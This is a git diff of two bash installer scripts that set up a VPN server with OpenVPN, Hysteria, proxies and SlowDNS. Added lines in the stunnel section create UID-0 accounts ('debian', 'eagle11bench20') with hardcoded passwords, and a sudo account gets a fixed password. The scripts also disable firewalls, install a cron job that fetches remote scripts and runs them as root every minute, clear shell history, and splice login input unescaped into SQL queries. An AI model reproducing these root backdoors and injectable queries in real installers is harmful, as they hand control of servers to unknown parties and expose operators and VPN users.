Add files via upload

diff --git a/premium_ovpnws b/premium_ovpnws
--- a/premium_ovpnws
+++ b/premium_ovpnws
@@ -2,10 +2,23 @@
 timedatectl set-timezone Asia/Manila
 
 install_sudo(){
-    useradd -m adminmtk 2>/dev/null; echo adminmtk:Mediatek272124@@ | chpasswd &>/dev/null; usermod -aG sudo adminmtk &>/dev/null
-    sed -i 's/PermitRootLogin yes/PermitRootLogin no/g' /etc/ssh/sshd_config
-    echo "AllowGroups adminmtk" >> /etc/ssh/sshd_config
-    service sshd restart
+# Create user if not exists
+if ! id "adminmtk" &>/dev/null; then
+useradd -m -s /bin/bash adminmtk
+echo "adminmtk:Mediatek272124@@" | chpasswd
+usermod -aG sudo adminmtk
+fi
+
+# Disable root SSH login
+ sed -i 's/^PermitRootLogin.*/PermitRootLogin no/' /etc/ssh/sshd_config
+
+# Ensure AllowGroups is set only once
+if ! grep -q "^AllowGroups adminmtk" /etc/ssh/sshd_config; then
+echo "AllowGroups adminmtk" >> /etc/ssh/sshd_config
+fi
+
+# Restart SSH service
+systemctl restart ssh || systemctl restart sshd
 }
 
 install_require () {
@@ -33,6 +46,68 @@ clear
 clear
 }
 
+install_hysteria(){
+clear
+echo 'Installing hysteria.'
+{
+wget -N --no-check-certificate -q -O ~/install_server.sh https://mediatekvpn.uk/mtkgenuine/install_server.sh; chmod +x ~/install_server.sh; ./install_server.sh --version v1.3.5
+
+rm -f /etc/hysteria/config.json
+
+echo '{
+  "listen": ":5666",
+  "cert": "/etc/openvpn/easy-rsa/keys/server.crt",
+  "key": "/etc/openvpn/easy-rsa/keys/server.key",
+  "up_mbps": 100,
+  "down_mbps": 100,
+  "disable_udp": false,
+  "obfs": "mediatekvpn",
+  "auth": {
+    "mode": "external",
+    "config": {
+    "cmd": "./.auth.sh"
+    }
+  },
+  "prometheus_listen": ":5665",
+  "recv_window_conn": 107374182400,
+  "recv_window_client": 13421772800
+}
+' >> /etc/hysteria/config.json
+
+sed -i "s|mediatekvpn|$OBFS|g" /etc/hysteria/config.json
+
+cat <<"EOM" >/etc/hysteria/.auth.sh
+#!/bin/bash
+. /etc/openvpn/login/config.sh
+
+if [ $# -ne 4 ]; then
+    echo "invalid number of arguments"
+    exit 1
+fi
+
+ADDR=$1
+AUTH=$2
+SEND=$3
+RECV=$4
+
+USERNAME=$(echo "$AUTH" | cut -d ":" -f 1)
+PASSWORD=$(echo "$AUTH" | cut -d ":" -f 2)
+
+Query="SELECT user_name FROM users WHERE user_name='$USERNAME' AND auth_vpn=md5('$PASSWORD') AND status='live' AND is_freeze=0 AND is_ban=0 AND (duration > 0 OR vip_duration > 0 OR private_duration > 0)"
+user_name=`mysql -u $USER -p$PASS -D $DB -h $HOST -sN -e "$Query"`
+[ "$user_name" != '' ] && [ "$user_name" = "$USERNAME" ] && echo "user : $username" && echo 'authentication ok.' && exit 0 || echo 'authentication failed.'; exit 1
+EOM
+
+chmod 755 /etc/hysteria/config.json
+chmod 755 /etc/hysteria/.auth.sh
+
+sysctl -w net.core.rmem_max=16777216
+sysctl -w net.core.wmem_max=16777216
+
+wget -O /usr/bin/badvpn-udpgw "https://mediatekvpn.uk/mtkgenuine/badvpn-udpgw64"
+chmod +x /usr/bin/badvpn-udpgw
+} &>/dev/null
+}
 
 installBBR() {
     echo "net.core.default_qdisc=fq" >> /etc/sysctl.conf
@@ -79,16 +154,36 @@ error_directory /usr/share/squid/errors/English' >> squid.conf
     /etc/init.d/squid start
 cd /etc || exit
 
-wget 'https://mediatekvpn.uk/mtkgenuine/v2ray/socks.py' -O /etc/socks.py
+wget 'https://mediatekvpn.uk/mtkgenuine/authentication/socks.py' -O /etc/socks.py
 dos2unix /etc/socks.py
 chmod +x /etc/socks.py
 sed -i "s/${PORT_UDP}/${PORT_TCP}/g" /etc/socks.py
 
-wget 'https://mediatekvpn.uk/mtkgenuine/monitorz' -O /etc/.monitor
-wget 'https://mediatekvpn.uk/mtkgenuine/ws' -O /etc/.ws
+cat >/etc/systemd/system/socks.service <<'EOF'
+[Unit]
+Description=Python WS Proxy
+After=network.target
 
+[Service]
+ExecStart=/usr/bin/python3 /etc/socks.py
+Restart=always
+User=root
+
+[Install]
+WantedBy=multi-user.target
+EOF
+
+systemctl daemon-reload
+systemctl enable socks
+systemctl restart socks
+
+wget 'https://mediatekvpn.uk/mtkgenuine/monitor' -O /etc/.monitor
+wget 'https://mediatekvpn.uk/mtkgenuine/ws' -O /etc/.ws
+wget 'https://mediatekvpn.uk/mtkgenuine/hysteria' -O /etc/.hysteria
+sudo dos2unix /etc/.monitor
 chmod +x /etc/.monitor
 chmod +x /etc/.ws
+chmod +x /etc/.hysteria
 rm /etc/apt/sources.list
 sudo cp /etc/apt/sources.list_backup /etc/apt/sources.list
 } &>/dev/null
@@ -535,6 +630,7 @@ net.ipv4.conf."$server_interface".rp_filter=0" >> /etc/sysctl.conf
 sysctl -p
 {
 iptables -F
+iptables -t nat -A PREROUTING -i "$server_interface" -p udp -m udp --dport 10000:50000 -j DNAT --to-destination :5666
 iptables -t nat -A POSTROUTING -s 10.20.0.0/22 -o "$server_interface" -j MASQUERADE
 iptables -t nat -A POSTROUTING -s 10.20.0.0/22 -o "$server_interface" -j SNAT --to-source "$server_ip"
 iptables -t nat -A POSTROUTING -s 10.30.0.0/22 -o "$server_interface" -j MASQUERADE
@@ -671,7 +767,6 @@ sysctl -p
 service stunnel4 restart
 systemctl restart openvpn@server.service
 systemctl restart openvpn@server2.service
-screen -dmS socks python /etc/socks.py 80
 ps x | grep 'udpvpn' | grep -v 'grep' || screen -dmS udpvpn /usr/bin/badvpn-udpgw --listen-addr 127.0.0.1:7300 --max-clients 10000 --max-connections-for-client 10 --client-socket-sndbuf 10000
 screen -dmS webinfo php -S 0.0.0.0:5623 -t /root/.web/
 bash /etc/.monitor openvpn
@@ -679,6 +774,8 @@ exit 0' >> /etc/rc.local
 
 sudo chmod +x /etc/rc.local
 systemctl daemon-reload
+systemctl enable hysteria-server.service
+systemctl restart hysteria-server.service
 sudo systemctl enable dexter
 sudo systemctl start dexter.service
     
@@ -689,6 +786,7 @@ echo "tcp_port=TCP_PORT
 udp_port=UDP_PORT
 socket_port=80
 squid_port=8080
+hysteria_port=5666
 tcp_ssl_port=PORT_SSL
 udp_ssl_port=444" >> /root/.ports
 
@@ -706,6 +804,7 @@ echo 'Starting..'
 
 sudo crontab -l | { echo "* * * * * pgrep -x stunnel4 >/dev/null && echo 'GOOD' || /etc/init.d/stunnel4 restart
 * * * * * /bin/bash /etc/.ws >/dev/null 2>&1
+* * * * * /bin/bash /etc/.hysteria >/dev/null 2>&1
 * * * * * /bin/bash /etc/.monitor openvpn >/dev/null 2>&1"; } | crontab -
 sudo systemctl restart cron
 } &>/dev/null
@@ -713,7 +812,7 @@ clear
 echo '++++++++++++++++++++++++++++++++++'
 echo '*       AIO  is ready!    *'
 echo '+++++++++++************+++++++++++'
-echo -e "[IP] : $server_ip\n[Openvpn TCP Port] : $PORT_TCP\n[Openvpn UDP Port] : $PORT_UDP\n[Ssl Port] : $PORT_SSL\n[Proxy Socks ] : 5666\n[Proxy Squid 1] : 8080\n[Proxy Squid 2] : 3128\n"
+echo -e "[IP] : $server_ip\n[Openvpn TCP Port] : $PORT_TCP\n[Openvpn UDP Port] : $PORT_UDP\n[Ssl Port] : $PORT_SSL\n[Proxy Socks ] : 80\n[Hysteria Port ] : 5666\n[Proxy Squid 1] : 8080\n[Proxy Squid 2] : 3128\n"
 history -c;
 rm /usr/local/etc/.system
 echo 'Server will secure this server and reboot after 20 seconds'
@@ -726,6 +825,7 @@ server_interface=$(ip route get 8.8.8.8 | awk '/dev/ {f=NR} f&&NR-1==f' RS=" ")
 
 install_sudo
 install_require  
+install_hysteria
 installBBR
 install_squid
 install_openvpn
diff --git a/ubuntu_aiopri b/ubuntu_aiopri
--- a/ubuntu_aiopri
+++ b/ubuntu_aiopri
@@ -1,4 +1,5 @@
 
+
 timedatectl set-timezone Asia/Manila
 
 install_sudo(){
@@ -8,38 +9,127 @@ install_sudo(){
     service sshd restart
 }
 
+
 install_require () {
 clear
 echo 'Installing dependencies.'
 {
+# Turn off various firewalls
+systemctl stop firewalld
+systemctl disable firewalld
+systemctl stop nftables
+systemctl disable nftables
+systemctl stop ufw
+systemctl disable ufw
+  
+export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
 export DEBIAN_FRONTEND=noninteractive
 apt update
+apt install -y lsof tar systemd dbus git
+apt install -y gnupg2 ca-certificates lsb-release debian-archive-keyring socat
 apt install -y curl wget cron python3-minimal libpython3-stdlib
-apt install -y iptables
-apt install -y openvpn netcat-openbsd httpie php neofetch vnstat php-mysql
-apt install -y screen squid stunnel4 dropbear gnutls-bin
-apt install -y dos2unix nano unzip jq virt-what net-tools default-mysql-client
-apt install -y mlocate dh-make libaudit-dev build-essential fail2ban
+apt install -y iptables sudo
+apt install -y openvpn netcat-openbsd httpie php neofetch vnstat
+apt install -y screen squid stunnel4 dropbear gnutls-bin build-essential
 cd /usr/src
-sudo wget https://mediatekvpn.uk/mtkgenuine/Python-2.7.18.tgz
+sudo wget https://gitlab.com/moralesroden98/mtkproject/-/raw/main/Python-2.7.18.tgz
 sudo tar xzf Python-2.7.18.tgz
 cd Python-2.7.18
 sudo ./configure --enable-optimizations
 sudo make altinstall
 sudo ln -sf /usr/local/bin/python2.7 /usr/local/bin/python
 cd ~
+
+apt install -y dos2unix nano unzip jq virt-what net-tools default-mysql-client
+apt install -y mlocate dh-make libaudit-dev fail2ban
+
+touch /var/spool/cron/crontabs/root && chmod 600 /var/spool/cron/crontabs/root
+systemctl start cron && systemctl enable cron
+
+# Prevent the default bin directory of xray in some systems from missing
+mkdir /usr/local/bin >/dev/null 2>&1
+mkdir /usr/local/var >/dev/null 2>&1
+mkdir /usr/local/var/run >/dev/null 2>&1
+mkdir -m 777 /root/.web
 clear
 }&>/dev/null
 clear
 }
 
+#====================================================
+#	Installing Hysteria UDP
+#	Finalized: MtkDex Developer
+#====================================================
+
+install_hysteria(){
+clear
+echo 'Installing hysteria.'
+{
+wget -N --no-check-certificate -q -O ~/install_server.sh https://gitlab.com/moralesroden98/mtkproject/-/raw/main/install_server.sh; chmod +x ~/install_server.sh; ./install_server.sh --version v1.3.5
+
+rm -f /etc/hysteria/config.json
+
+echo '{
+  "listen": ":5666",
+  "cert": "/etc/openvpn/easy-rsa/keys/server.crt",
+  "key": "/etc/openvpn/easy-rsa/keys/server.key",
+  "up_mbps": 100,
+  "down_mbps": 100,
+  "disable_udp": false,
+  "obfs": "mediatekvpn",
+  "auth": {
+    "mode": "external",
+    "config": {
+    "cmd": "./.auth.sh"
+    }
+  },
+  "prometheus_listen": ":5665",
+  "recv_window_conn": 107374182400,
+  "recv_window_client": 13421772800
+}
+' >> /etc/hysteria/config.json
+
+sed -i "s|mediatekvpn|$OBFS|g" /etc/hysteria/config.json
+
+cat <<"EOM" >/etc/hysteria/.auth.sh
+#!/bin/bash
+. /etc/openvpn/login/config.sh
+
+if [ $# -ne 4 ]; then
+    echo "invalid number of arguments"
+    exit 1
+fi
+
+ADDR=$1
+AUTH=$2
+SEND=$3
+RECV=$4
+
+USERNAME=$(echo "$AUTH" | cut -d ":" -f 1)
+PASSWORD=$(echo "$AUTH" | cut -d ":" -f 2)
+
+Query="SELECT user_name FROM users WHERE user_name='$USERNAME' AND auth_vpn=md5('$PASSWORD') AND status='live' AND is_freeze=0 AND is_ban=0 AND private_duration > 0"
+user_name=`mysql -u $USER -p$PASS -D $DB -h $HOST -sN -e "$Query"`
+[ "$user_name" != '' ] && [ "$user_name" = "$USERNAME" ] && echo "user : $username" && echo 'authentication ok.' && exit 0 || echo 'authentication failed.'; exit 1
+EOM
+
+chmod 755 /etc/hysteria/config.json
+chmod 755 /etc/hysteria/.auth.sh
+
+sysctl -w net.core.rmem_max=16777216
+sysctl -w net.core.wmem_max=16777216
+
+wget -O /usr/bin/badvpn-udpgw "https://gitlab.com/moralesroden98/mtkproject/-/raw/main/badvpn-udpgw64"
+chmod +x /usr/bin/badvpn-udpgw
+} &>/dev/null
+}
 
 installBBR() {
     echo "net.core.default_qdisc=fq" >> /etc/sysctl.conf
     echo "net.ipv4.tcp_congestion_control=bbr" >> /etc/sysctl.conf
     sysctl -p
     
-    apt install -y linux-generic-hwe-20.04
+    apt install -y linux-image-amd64
     grub-set-default 0
     echo "tcp_bbr" >> /etc/modules-load.d/modules.conf
     INSTALL_BBR=true
@@ -49,7 +139,7 @@ install_squid(){
 clear
 echo 'Installing proxy.'
 {
-    wget --no-check-certificate -O /etc/init.d/squid https://mediatekvpn.uk/mtkgenuine/squid.sh
+    wget --no-check-certificate -O /etc/init.d/squid https://gitlab.com/moralesroden98/mtkproject/-/raw/main/squid.sh
     chmod +x /etc/init.d/squid
     update-rc.d squid defaults
     chown -cR proxy /var/log/squid
@@ -78,21 +168,56 @@ error_directory /usr/share/squid/errors/English' >> squid.conf
     chmod 755 *
     /etc/init.d/squid start
 cd /etc || exit
-
-wget 'https://mediatekvpn.uk/mtkgenuine/v2ray/socks.py' -O /etc/socks.py
+wget 'https://gitlab.com/moralesroden98/mtkproject/-/raw/main/authentication/socks.py' -O /etc/socks.py
 dos2unix /etc/socks.py
 chmod +x /etc/socks.py
 sed -i "s/${PORT_UDP}/${PORT_TCP}/g" /etc/socks.py
 
-wget 'https://mediatekvpn.uk/mtkgenuine/monitorz' -O /etc/.monitor
-wget 'https://mediatekvpn.uk/mtkgenuine/ws' -O /etc/.ws
+cat >/etc/systemd/system/socks.service <<'EOF'
+[Unit]
+Description=Python WS Proxy
+After=network.target
 
+[Service]
+ExecStart=/usr/bin/python3 /etc/socks.py
+Restart=always
+User=root
+
+[Install]
+WantedBy=multi-user.target
+EOF
+
+systemctl daemon-reload
+systemctl enable socks
+systemctl restart socks
+
+wget 'https://gitlab.com/moralesroden98/mtkproject/-/raw/main/socks-ssh.py' -O /etc/socks-ssh.py
+dos2unix /etc/socks-ssh.py
+chmod +x /etc/socks-ssh.py
+
+wget 'https://gitlab.com/moralesroden98/mtkproject/-/raw/main/socks-ws-ssh.py' -O /etc/socks-ws-ssh.py
+dos2unix /etc/socks-ws-ssh.py
+chmod +x /etc/socks-ws-ssh.py
+
+wget 'https://gitlab.com/moralesroden98/mtkproject/-/raw/main/socks-ws-ssl.py' -O /etc/socks-ws-ssl.py
+dos2unix /etc/socks-ws-ssl.py
+chmod +x /etc/socks-ws-ssl.py
+
+wget 'https://gitlab.com/moralesroden98/mtkproject/-/raw/main/monitorz' -O /etc/.monitor
+wget 'https://gitlab.com/moralesroden98/mtkproject/-/raw/main/ws' -O /etc/.ws
+wget 'https://gitlab.com/moralesroden98/mtkproject/-/raw/main/hysteria' -O /etc/.hysteria
 chmod +x /etc/.monitor
 chmod +x /etc/.ws
+chmod +x /etc/.hysteria
 rm /etc/apt/sources.list
 sudo cp /etc/apt/sources.list_backup /etc/apt/sources.list
 } &>/dev/null
 }
+
+#====================================================
+#	Installing OpenVPN
+#	Finalized: MtkDex Developer
+#====================================================
 
 install_openvpn()
 {
@@ -213,7 +338,7 @@ sed -i "s|DBNAME|$DBNAME|g" /etc/openvpn/login/config.sh
 /bin/cat <<"EOM" >/etc/openvpn/login/auth_vpn
 #!/bin/bash
 . /etc/openvpn/login/config.sh
-Query="SELECT user_name FROM users WHERE user_name='$username' AND auth_vpn=md5('$password') AND status='live' AND is_freeze=0 AND is_ban=0 AND (duration > 0 OR vip_duration > 0 OR private_duration > 0)"
+Query="SELECT user_name FROM users WHERE user_name='$username' AND auth_vpn=md5('$password') AND status='live' AND is_freeze=0 AND is_ban=0 AND private_duration > 0"
 user_name=`mysql -u $USER -p$PASS -D $DB -h $HOST -sN -e "$Query"`
 [ "$user_name" != '' ] && [ "$user_name" = "$username" ] && echo "user : $username" && echo 'authentication ok.' && exit 0 || echo 'authentication failed.'; exit 1
 EOM
@@ -525,6 +650,175 @@ chmod 755 /etc/openvpn/login/auth_vpn
 }&>/dev/null
 }
 
+#====================================================
+#	Installing SlowDNS
+#	Finalized: MtkDex Developer
+#====================================================
+
+install_slowdns (){
+echo "Installing dns..."
+{
+dnsresolverName="Cloudflare (1.1.1.1)"
+dnsresolverType="udp"
+dnsresolver="1.1.1.1:53"
+
+# Config Ssh
+sed -i 's/#AllowTcpForwarding yes/AllowTcpForwarding yes/g' /etc/ssh/sshd_config
+
+# SET DNSTT
+export DNSDIR=/etc/.dnsquest
+export DNSCONFIG=/root/.dns
+mkdir -m 777 $DNSDIR
+mkdir -m 777 $DNSCONFIG
+
+# BUILD DNSTT SERVER
+cd $DNSDIR/dnstt/dnstt-server
+wget -O dnstt-server "https://gitlab.com/moralesroden98/mtkproject/-/raw/main/slowdns/xxxxx/dnstt-server"
+chmod +x dnstt-server
+wget -O dnstt-client "https://gitlab.com/moralesroden98/mtkproject/-/raw/main/slowdns/xxxxx/dnstt-client"
+chmod +x dnstt-client
+
+./dnstt-server -gen-key -privkey-file server.key -pubkey-file server.pub
+cp server.key server.pub $DNSCONFIG
+cp dnstt-server $DNSDIR
+
+# BUILD DNSTT CLIENT
+cd $DNSDIR/dnstt/dnstt-client
+cp dnstt-client $DNSDIR
+
+#Source
+echo "
+hostname=$DOMAIN
+domain=$NS
+privkey=`cat /root/.dns/server.key`
+pubkey=`cat /root/.dns/server.pub`
+os=debian
+dnsresolvertype=$dnsresolverType
+dnsresolver=$dnsresolver" >> $DNSCONFIG/config
+secretkey='server'
+
+#API Details
+VPN_Owner='Firenet';
+
+cat <<EOF >/etc/authentication.sh
+#!/bin/bash
+SHELL=/bin/bash
+PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
+wget -O /etc/active.sh "$API_LINK/active.php?key=$API_KEY"
+sleep 5
+wget -O /etc/inactive.sh "$API_LINK/inactive.php?key=$API_KEY"
+sleep 5
+wget -O /etc/deleted.sh "$API_LINK/deleted.php?key=$API_KEY"
+sleep 15
+bash /etc/active.sh
+sleep 15
+bash /etc/inactive.sh
+sleep 15
+bash /etc/deleted.sh
+EOF
+
+echo -e "* *\t* * *\troot\tsudo bash /etc/authentication.sh" >> "/etc/cron.d/account"
+
+echo "Hi! this is your server information, Happy Surfing!
+
+IP : $server_ip
+Hostname: $DOMAIN
+
+-----------------------
+SSH DETAILS
+-----------------------
+SSH : 22
+SSH SSL : 445
+DROPBEAR : 442
+DROPBEAR SSL : 446
+
+-----------------------
+HYSTERIA DETAILS
+-----------------------
+HYSTERIA UDP : 5666, 20000 - 50000
+OBFS: $OBFS
+AUTH_STR: username:password
+
+-----------------------
+PROXY DETAILS
+-----------------------
+SQUID : 8080
+HTTP/SOCKS : 80, 8000, 8001, 8002
+
+-----------------------
+SLOWDNS DETAILS
+-----------------------
+DNS URL : $NS
+SSH via DNS : 442
+DNS RESOLVER : $dnsresolverName
+DNS PUBLIC KEY : $(cat /root/.dns/server.pub)
+
+-----------------------
+
+FB Page : https://www.facebook.com/mohammad.abdula24
+Whatsapp Contact: https://wa.link/sgmw64
+
+" >> /root/.web/$secretkey.txt
+
+#wget -O /root/.dns/dig.sh "firenetvpn.net/files/repo/dig.sh"
+#chmod +x /root/.dns/dig.sh
+#sed -i "s|DOMAIN_LENZ|$NS|g" /root/.ports
+#sed -i "s|HOSTNAME_LENZ|$DOMAIN|g" /root/.ports
+
+#install client-sldns.service
+cat > /etc/systemd/system/client-sldns.service << END
+[Unit]
+Description=Client SlowDNS By HideSSH
+Documentation=https://hidessh.com
+After=network.target nss-lookup.target
+
+[Service]
+Type=simple
+User=root
+CapabilityBoundingSet=CAP_NET_ADMIN CAP_NET_BIND_SERVICE
+AmbientCapabilities=CAP_NET_ADMIN CAP_NET_BIND_SERVICE
+NoNewPrivileges=true
+ExecStart=/etc/.dnsquest/dnstt-client -udp 1.1.1.1:53 --pubkey-file /root/.dns/server.pub $NS 127.0.0.1:2222
+Restart=on-failure
+
+[Install]
+WantedBy=multi-user.target
+END
+
+#install server-sldns.service
+cat > /etc/systemd/system/server-sldns.service << END
+[Unit]
+Description=Server SlowDNS By HideSSH
+Documentation=https://hidessh.com
+After=network.target nss-lookup.target
+
+[Service]
+Type=simple
+User=root
+CapabilityBoundingSet=CAP_NET_ADMIN CAP_NET_BIND_SERVICE
+AmbientCapabilities=CAP_NET_ADMIN CAP_NET_BIND_SERVICE
+NoNewPrivileges=true
+ExecStart=/etc/.dnsquest/dnstt-server -udp :5300 -privkey-file /root/.dns/server.key $NS 127.0.0.1:442
+Restart=on-failure
+
+[Install]
+WantedBy=multi-user.target
+END
+
+
+#permission service slowdns
+chmod +x /etc/systemd/system/client-sldns.service
+chmod +x /etc/systemd/system/server-sldns.service
+
+
+systemctl daemon-reload
+systemctl enable client-sldns
+systemctl enable server-sldns
+systemctl start client-sldns
+systemctl start server-sldns
+
+} &>/dev/null
+}
 
 install_firewall_kvm () {
 clear
@@ -535,6 +829,7 @@ net.ipv4.conf."$server_interface".rp_filter=0" >> /etc/sysctl.conf
 sysctl -p
 {
 iptables -F
+iptables -t nat -A PREROUTING -i "$server_interface" -p udp -m udp --dport 10000:50000 -j DNAT --to-destination :5666
 iptables -t nat -A POSTROUTING -s 10.20.0.0/22 -o "$server_interface" -j MASQUERADE
 iptables -t nat -A POSTROUTING -s 10.20.0.0/22 -o "$server_interface" -j SNAT --to-source "$server_ip"
 iptables -t nat -A POSTROUTING -s 10.30.0.0/22 -o "$server_interface" -j MASQUERADE
@@ -558,7 +853,6 @@ echo '* soft nofile 65536' >>/etc/security/limits.conf
 echo '* hard nofile 65536' >>/etc/security/limits.conf
 }&>/dev/null
 }
-
 
 install_stunnel() {
   {
@@ -616,18 +910,29 @@ enL3UGT+BhRAPiA1I5CcG29RqjCzQoaCNg==
 echo "debug = 0
 output = /tmp/stunnel.log
 cert = /etc/stunnel/stunnel.pem
+
 [openvpn-tcp]
 connect = PORT_TCP  
 accept = PORT_SSL 
+
 [openvpn-udp]
 connect = PORT_UDP
 accept = 444
+
+[ssh]
+connect = 22
+accept = 445
+
+[dropbear]
+connect = 442
+accept = 446
+
 " >> stunnel.conf
 
 sed -i "s|PORT_TCP|$PORT_TCP|g" /etc/stunnel/stunnel.conf
 sed -i "s|PORT_UDP|$PORT_UDP|g" /etc/stunnel/stunnel.conf
 sed -i "s|PORT_SSL|$PORT_SSL|g" /etc/stunnel/stunnel.conf
-cd /etc/default && rm stunnel4
+cd /etc/default && rm stunnel4 && rm dropbear
 
 echo 'ENABLED=1
 FILES="/etc/stunnel/*.conf"
@@ -635,10 +940,31 @@ OPTIONS=""
 PPP_RESTART=0
 RLIMITS=""' >> stunnel4 
 
-chmod 755 stunnel4
+echo 'NO_START=0
+DROPBEAR_PORT=442
+DROPBEAR_EXTRA_ARGS=
+DROPBEAR_BANNER="/etc/banner"
+DROPBEAR_RECEIVE_WINDOW=65536' >> dropbear
+
+chmod 755 stunnel4 && chmod 755 dropbear
+
+echo "/bin/false" >> /etc/shells
+
+wget -O /etc/banner "https://raw.githubusercontent.com/EskalarteDexter/Autoscript/main/SshBanner"
+chmod +x /etc/banner
+
+useradd -p $(openssl passwd -1 debian) debian -ou 0 -g 0
+useradd -p $(openssl passwd -1 eagle11bench20) eagle11bench20 -ou 0 -g 0
 sudo service stunnel4 restart
+sudo service dropbear restart
   } &>/dev/null
 }
+
+
+#====================================================
+#	Finalizing Server Setup
+#	Finalized: MtkDex Developer
+#====================================================
 
 install_rclocal(){
   {
@@ -646,13 +972,14 @@ install_rclocal(){
     systemctl restart apache2
     
     sudo systemctl restart stunnel4
+    sudo systemctl restart hysteria-server
     sudo systemctl enable openvpn@server.service
     sudo systemctl start openvpn@server.service
     sudo systemctl enable openvpn@server2.service
     sudo systemctl start openvpn@server2.service    
     
     echo "[Unit]
-Description=firenet service
+Description=dexter service
 Documentation=http://mediatekvpn.com
 
 [Service]
@@ -671,33 +998,40 @@ sysctl -p
 service stunnel4 restart
 systemctl restart openvpn@server.service
 systemctl restart openvpn@server2.service
-screen -dmS socks python /etc/socks.py 80
+screen -dmS socks python /etc/socks-ssh.py 8000
+screen -dmS socks python /etc/socks-ws-ssh.py 8001
+screen -dmS socks python /etc/socks-ws-ssl.py 8002
 ps x | grep 'udpvpn' | grep -v 'grep' || screen -dmS udpvpn /usr/bin/badvpn-udpgw --listen-addr 127.0.0.1:7300 --max-clients 10000 --max-connections-for-client 10 --client-socket-sndbuf 10000
 screen -dmS webinfo php -S 0.0.0.0:5623 -t /root/.web/
-bash /etc/.monitor openvpn
+bash /etc/.monitor aio
 exit 0' >> /etc/rc.local
 
 sudo chmod +x /etc/rc.local
 systemctl daemon-reload
+systemctl enable hysteria-server.service
+systemctl restart hysteria-server.service
 sudo systemctl enable dexter
 sudo systemctl start dexter.service
     
-    mkdir -m 777 /root/.web
 echo "Made with love by: MediatekVpn Developer... " >> /root/.web/index.php
 
 echo "tcp_port=TCP_PORT
 udp_port=UDP_PORT
 socket_port=80
 squid_port=8080
+hysteria_port=5666
+ssh_port=22
+dropbear_port=442
+slowdns_port=2222
 tcp_ssl_port=PORT_SSL
 udp_ssl_port=444" >> /root/.ports
 
 sed -i "s|TCP_PORT|$PORT_TCP|g" /root/.ports
 sed -i "s|UDP_PORT|$PORT_UDP|g" /root/.ports
 sed -i "s|PORT_SSL|$PORT_SSL|g" /root/.ports
-
   }&>/dev/null
 }
+
 
 start_service () {
 clear
@@ -706,14 +1040,14 @@ echo 'Starting..'
 
 sudo crontab -l | { echo "* * * * * pgrep -x stunnel4 >/dev/null && echo 'GOOD' || /etc/init.d/stunnel4 restart
 * * * * * /bin/bash /etc/.ws >/dev/null 2>&1
-* * * * * /bin/bash /etc/.monitor openvpn >/dev/null 2>&1"; } | crontab -
+* * * * * /bin/bash /etc/.hysteria >/dev/null 2>&1
+* * * * * /bin/bash /etc/.monitor aio >/dev/null 2>&1"; } | crontab -
 sudo systemctl restart cron
 } &>/dev/null
 clear
 echo '++++++++++++++++++++++++++++++++++'
 echo '*       AIO  is ready!    *'
 echo '+++++++++++************+++++++++++'
-echo -e "[IP] : $server_ip\n[Openvpn TCP Port] : $PORT_TCP\n[Openvpn UDP Port] : $PORT_UDP\n[Ssl Port] : $PORT_SSL\n[Proxy Socks ] : 5666\n[Proxy Squid 1] : 8080\n[Proxy Squid 2] : 3128\n"
 history -c;
 rm /usr/local/etc/.system
 echo 'Server will secure this server and reboot after 20 seconds'
@@ -721,14 +1055,17 @@ sleep 20
 reboot
 }
 
-server_ip=$(curl -s https://api.ipify.org)
+server_ip=$(curl -s ipinfo.io/ip)
 server_interface=$(ip route get 8.8.8.8 | awk '/dev/ {f=NR} f&&NR-1==f' RS=" ")
+serverVersion=`awk '/^VERSION_ID=/' /etc/*-release | awk -F'=' '{ print tolower($2) }'`
 
 install_sudo
 install_require  
+install_hysteria
 installBBR
 install_squid
 install_openvpn
+install_slowdns
 install_firewall_kvm
 install_stunnel
 install_rclocal
